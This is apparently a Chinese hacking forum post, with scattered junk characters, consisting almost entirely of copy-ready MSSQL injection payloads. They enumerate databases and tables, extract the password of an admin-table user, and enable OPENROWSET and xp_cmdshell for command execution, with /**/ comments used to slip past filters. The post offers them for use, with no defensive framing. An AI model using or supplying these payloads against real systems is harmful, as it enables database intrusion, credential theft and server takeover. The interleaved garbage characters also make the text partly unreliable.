6 G% D. k s, L2 e# C1 k1 f2 G' K4 ^/ J& Y+ [
7 W/ K6 I6 n3 V* P7 m B. _[Copy to clipboard]CODE:
7 X* `0 h; ~ L' z+ T/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0-- S5 i1 A; E6 ^1 x- k- V
! _$ O( k; z* `" z! q: c
爆表语句,somedb部份是所要列的数据库,红色数字1累加
8 M% w* U1 k5 i8 T+ ?
6 h, v( F' o) \4 n/ ^0 v
5 }6 O5 E" E# {& c4 q[Copy to clipboard]CODE:
$ _" t- I; G1 t/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
% H8 P4 l& A5 n* q: W: E: t6 j9 y" D3 z" W1 H( P7 }4 Z1 \( K* i
爆字段语句,爆表admin里user='icerover'的密码段
, ]1 Z; q$ w# o' N0 i- m1 M1 A3 j0 O3 b$ j& s
9 A% ^/ c# e7 }% ]
[Copy to clipboard]CODE:
. h- o# M0 G! c7 r3 y- Z7 ?**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--1 C$ h" H& [7 w0 f$ S2 f
9 j+ C* b7 ^5 U, K9 dmssql2005默认没有开xp_cmdshell的,openrowset也不能用
8 ?8 G! {5 z1 F2 f如果是sa权限,可以这样来开启
. a6 q8 w0 H0 Y% l开启openrowset8 V) ?0 n5 Y2 r- E) ^9 v) M
, V. F* x7 y% F7 f8 ?2 d0 k- G
0 U7 i G: V! J! {% [- i[Copy to clipboard]CODE:
0 ?4 u. m$ H# z: J) k/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
# s6 i h* `8 k/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
& }! a: o& ^2 [3 o
5 m% F. E; |8 U+ r7 a; H2 Y0 s$ I开启xp_cmdshell
0 t: j# Y! H4 D
! r3 y. t. z% V6 O. p6 y! F4 r- H3 [
[Copy to clipboard]CODE:4 n: _! `* C$ U% {8 j5 V2 ?2 }. h2 z
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
\0 d6 e F- D6 dEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
. H* O+ e0 u: y$ N7 F! K
' w* x0 r6 _: v, L. `6 B8 Uok,over~~晚安
, B u& G+ x6 d, Z9 S D |